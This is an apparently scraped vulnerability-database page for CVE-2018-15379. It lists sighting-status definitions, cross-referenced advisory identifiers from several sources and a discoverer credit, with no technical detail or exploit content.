Confirmed: The vulnerability is confirmed from an analyst perspective.
Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
Patched: This vulnerability was successfully patched by the user reporting the sighting.
Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
Not confirmed: The user expresses doubt about the veracity of the vulnerability.
Not patched: This vulnerability was not successfully patched by the user reporting the sighting.

Action not permitted

CVE-2018-15379

Vulnerability from cvelistv5

var-201810-0571

Vulnerability from variot

> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security (http://www.agileinfosec.co.uk/)

1

2

ghsa-h92j-m24w-8xp7

Vulnerability from github

cisco-sa-20181003-pi-tftp

Vulnerability from csaf_cisco

gsd-2018-15379

Vulnerability from gsd

Tags

Sightings

Nomenclature